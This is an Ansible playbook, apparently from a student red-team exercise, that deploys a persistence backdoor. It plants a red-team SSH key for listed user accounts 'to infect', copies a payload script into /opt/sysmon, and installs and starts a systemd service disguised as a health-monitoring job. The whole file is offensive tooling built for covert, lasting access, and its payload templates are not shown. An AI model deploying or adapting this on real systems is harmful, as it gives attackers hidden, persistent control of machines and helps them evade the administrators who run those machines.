---
# Jared Korwatch
# jmk9339@rit.edu

- name: Deploy systemd persistence tool
  hosts: all
  become: yes

  # config
  vars:
    # red team config
    red_team_pub_key: "{{ lookup('file', '../id_rsa.pub') | trim }}" # red team pub key in dir
    victim_users_list: "liquidator shifteng medic dosimeter logkeeper" # usr accounts to infect

    # target paths
    payload_dir: /opt/sysmon
    payload_script_name: monitor.sh
    service_name: system_health_archive.service


  tasks:
    - name: 1. Ensure payload directory ({{ payload_dir }}) exists
      ansible.builtin.file:
        path: "{{ payload_dir }}"
        state: directory
        mode: '0755'

    - name: 2. Deploy Persistence Payload Script ({{ payload_script_name }})
      ansible.builtin.template:
        src: templates/multi_user_persistence.sh.j2
        dest: "{{ payload_dir }}/{{ payload_script_name }}"
        mode: '0700' 

    - name: 3. Deploy Stealthy systemd Unit File ({{ service_name }})
      ansible.builtin.template:
        src: templates/{{ service_name }}.j2
        dest: "/etc/systemd/system/{{ service_name }}"
        mode: '0644'

    - name: 4. Reload systemd daemon to recognize the new service
      ansible.builtin.systemd:
        daemon_reload: yes

    - name: 5. Enable and Start Persistence Service
      ansible.builtin.systemd:
        name: "{{ service_name }}"
        enabled: yes
        state: started